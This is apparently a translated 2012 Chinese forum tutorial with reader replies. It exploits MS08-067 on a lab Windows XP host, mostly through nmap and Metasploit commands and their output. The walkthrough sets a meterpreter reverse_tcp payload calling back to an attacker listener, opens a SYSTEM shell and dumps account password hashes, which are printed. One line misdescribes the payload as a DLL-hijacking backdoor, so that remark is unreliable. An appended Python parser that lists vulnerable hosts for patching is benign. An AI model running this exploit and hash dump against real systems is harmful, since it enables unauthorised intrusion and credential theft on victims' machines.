6. Performing an overflow attack with MSF
Posted on 2012-8-4 17:00:21
Start uB1 and XP2.
First use nmap to see whether the target is vulnerable:
  root@Dis9Team:/pen/nmap/share/nmap/scripts# ls | grep smb
  smb-brute.nse
  smb-check-vulns.nse
  smb-enum-domains.nse
  smb-enum-groups.nse
  smb-enum-processes.nse
  smb-enum-sessions.nse
  smb-enum-shares.nse
  smb-enum-users.nse
  smb-flood.nse
  smb-os-discovery.nse
  smb-psexec.nse
  smb-security-mode.nse
  smb-server-stats.nse
  smb-system-info.nse
  smbv2-enabled.nse
  root@Dis9Team:/pen/nmap/share/nmap/scripts#
The smb-check-vulns.nse script scans for SMB vulnerabilities:
  root@Dis9Team:~# nmap --script=smb-check-vulns 5.5.5.3 -p 445 -T5 -sS

  Starting Nmap 5.51 ( http://nmap.org ) at 2012-05-11 23:47 CST
  Nmap scan report for 5.5.5.3
  Host is up (0.00078s latency).
  PORT    STATE SERVICE
  445/tcp open  microsoft-ds
  MAC Address: 08:08:27:00:00:02 (Unknown)

  Host script results:
  | smb-check-vulns:
  |   MS08-067: VULNERABLE
  |   Conficker: Likely CLEAN
  |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
  |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
  |   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
  |_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

  Nmap done: 1 IP address (1 host up) scanned in 6.28 seconds
  root@Dis9Team:~#

If you want to scan the system with all of the scripts, you can do this:
  root@Dis9Team:~# nmap --script=smb* 5.5.5.3 -p 445 -T5 -sS
This scans with every script whose name starts with smb.
There are plenty of vulnerabilities; let's use MS08-067.
Start METASPLOIT:
  root@Dis9Team:~# msfconsole
Search for the vulnerability:
  msf > search MS08-067

  Matching Modules
  ================

     Name                                 Disclosure Date  Rank   Description
     ----                                 ---------------  ----   -----------
     exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption


  msf >
Enter the exploit module:
  msf > use exploit/windows/smb/ms08_067_netapi
  msf  exploit(ms08_067_netapi) >
View the module info:
  msf  exploit(ms08_067_netapi) > info

         Name: Microsoft Server Service Relative Path Stack Corruption
       Module: exploit/windows/smb/ms08_067_netapi
      Version: 14976
     Platform: Windows
   Privileged: Yes
      License: Metasploit Framework License (BSD)
         Rank: Great

  Provided by:
    hdm
    Brett Moore

    staylor
    jduck

  Available targets:
    Id  Name
    --  ----
    0   Automatic Targeting
    1   Windows 2000 Universal
  ----------------------------
    62  Windows XP SP3 Turkish (NX)
    63  Windows 2003 SP2 Japanese (NO NX)

  Basic options:
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    RHOST                     yes       The target address
    RPORT    445              yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

  Payload information:
    Space: 400
    Avoid: 8 characters

  Description:
    This module exploits a parsing flaw in the path canonicalization
    code of NetAPI32.dll through the Server Service. This module is
    capable of bypassing NX on some operating systems and service packs.
    The correct target must be used to prevent the Server Service (along
    with a dozen others in the same process) from crashing. Windows XP
    targets seem to handle multiple successful exploitation events, but
    2003 targets will often crash or hang on subsequent attempts. This
    is just the first version of this module, full support for NX bypass
    on 2003, along with other platforms, is still in development.

  References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
    http://www.osvdb.org/49243
    http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
    http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

  msf  exploit(ms08_067_netapi) >
View the module options:
  msf  exploit(ms08_067_netapi) > show options

  Module options (exploit/windows/smb/ms08_067_netapi):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     RHOST                     yes       The target address
     RPORT    445              yes       Set the SMB service port
     SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


  Exploit target:

     Id  Name
     --  ----
     0   Automatic Targeting


  msf  exploit(ms08_067_netapi) >
Set the target address:
  msf  exploit(ms08_067_netapi) > set RHOST 5.5.5.3
  RHOST => 5.5.5.3
Set the backdoor type (backdoor types will be covered in detail later):
  msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf  exploit(ms08_067_netapi) >
The one above is a DLL-hijacking TCP backdoor.
Check the options again:
  msf  exploit(ms08_067_netapi) > show options

  Module options (exploit/windows/smb/ms08_067_netapi):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     RHOST    5.5.5.3          yes       The target address
     RPORT    445              yes       Set the SMB service port
     SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


  Payload options (windows/meterpreter/reverse_tcp):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
     LHOST                      yes       The listen address
     LPORT     4444             yes       The listen port


  Exploit target:

     Id  Name
     --  ----
     0   Automatic Targeting


  msf  exploit(ms08_067_netapi) >
There is now an extra Payload options section.
Set the local listening IP in the Payload options:
  msf  exploit(ms08_067_netapi) > set LHOST 5.5.5.5
  LHOST => 5.5.5.5
View the target systems:
  msf  exploit(ms08_067_netapi) > show targets

  Exploit targets:

     Id  Name
     --  ----
     0   Automatic Targeting
     1   Windows 2000 Universal
     2   Windows XP SP0/SP1 Universal
     3   Windows XP SP2 English (AlwaysOn NX)
  ----------------------------
     63  Windows 2003 SP2 Japanese (NO NX)


  msf  exploit(ms08_067_netapi) >
There are 63 of them; let's scan the target OS with nmap:
  root@Dis9Team:~# nmap -O 5.5.5.3

  Starting Nmap 5.51 ( http://nmap.org ) at 2012-05-12 00:18 CST
  Nmap scan report for 5.5.5.3
  Host is up (0.0014s latency).
  Not shown: 997 closed ports
  PORT    STATE SERVICE
  135/tcp open  msrpc
  139/tcp open  netbios-ssn
  445/tcp open  microsoft-ds
  MAC Address: 08:08:27:00:00:02 (Unknown)
  Device type: general purpose
  Running: Microsoft Windows XP|2003
  OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
  Network Distance: 1 hop

  OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 8.90 seconds
  root@Dis9Team:~#
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Let's find the Simplified Chinese XP SP2 entry:
   17  Windows XP SP2 Chinese - Simplified (NX)
It's 17. Set the target:
  msf  exploit(ms08_067_netapi) > set TARGET 17
  TARGET => 17
Run the overflow exploit:
  msf  exploit(ms08_067_netapi) > exploit

  [*] Started reverse handler on 5.5.5.5:4444
  [*] Attempting to trigger the vulnerability...
  [*] Sending stage (752128 bytes) to 5.5.5.3
  [*] Meterpreter session 1 opened (5.5.5.5:4444 -> 5.5.5.3:1047) at 2012-05-12 00:20:04 +0800

  meterpreter >
Get the hashes:
  meterpreter > run post/windows/gather/hashdump

  [*] Obtaining the boot key...
  [*] Calculating the hboot key using SYSKEY 93bff8a1e439b8295b2b15e6ea866265...
  [*] Obtaining the user list and keys...
  [*] Decrypting user keys...
  [*] Dumping password hashes...


  Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:b0cda684b399c4c78f372dd9a09e97d9:e4ba8d4915472ef17037a1b8f6cfb86b:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:a4ad77912a1ffe62db66144036652be1:::
  brk:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::


  meterpreter >
Get CMD.EXE:
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > shell

Play a thousand tunes and you will understand music; examine a thousand swords and you will know weapons.
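A small triage helper, added here as an example and not part of the original post or of nmap itself: it parses nmap's normal output for smb-check-vulns results across several hosts and lists those that report MS08-067 as VULNERABLE, which is what a defender would turn into a patch list, plus the checks that were skipped and may need a re-scan. The 5.5.5.3 report is the one from the post; the 5.5.5.7 host and its NOT VULNERABLE result are constructed.

```python
import re

# Constructed sample: 5.5.5.3 is the report from the post above,
# 5.5.5.7 is a made-up second host to show multi-host handling.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 5.5.5.3
Host is up (0.00078s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap scan report for 5.5.5.7
Host is up (0.0010s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|_  Conficker: Likely CLEAN
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# Script lines start with "|" (or "|_" for the last one), then name: status.
CHECK_RE = re.compile(
    r"^\|_?\s+(?P<name>[^:]+?): "
    r"(?P<status>VULNERABLE|NOT VULNERABLE|Likely \w+|CHECK DISABLED|ERROR)")

def parse_smb_check_vulns(text):
    """Return {host: {check_name: status}} parsed from nmap normal output."""
    results, host, in_script = {}, None, False
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host, in_script = m.group(1), False
            results[host] = {}
            continue
        if line.startswith("| smb-check-vulns:"):
            in_script = True
            continue
        if in_script:
            m = CHECK_RE.match(line)
            if m and host is not None:
                results[host][m.group("name")] = m.group("status")
            else:
                in_script = False  # blank line or another script: block ended

    return results

def hosts_needing_patch(results, check="MS08-067"):
    """Hosts where the given check came back VULNERABLE (the patch list)."""
    return sorted(h for h, c in results.items() if c.get(check) == "VULNERABLE")

def disabled_checks(results, host):
    """Checks skipped on a host, i.e. candidates for a re-scan with unsafe=1."""
    return sorted(n for n, s in results[host].items() if s == "CHECK DISABLED")
```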
Posted on 2014-8-16 20:13:44
Phant0m0308
Posted on 2014-8-17 05:16:11
What does that mean?
Posted on 2014-8-17 13:20:02
店小二01 posted on 2014-8-17 05:16
What does that mean?

Sigh, it's scary to be so uninformed; it's an id from 幽灵 (Ghost).
Posted on 2015-3-14 09:39:56
This is a top-tier penetration-testing tool.
Posted on 2015-9-15 16:15:19
Just having a look.
Posted on 2015-10-8 15:22:35
Nice.. learned something.. good
Posted on 2016-1-25 16:50:24
Nice.. learned something.. good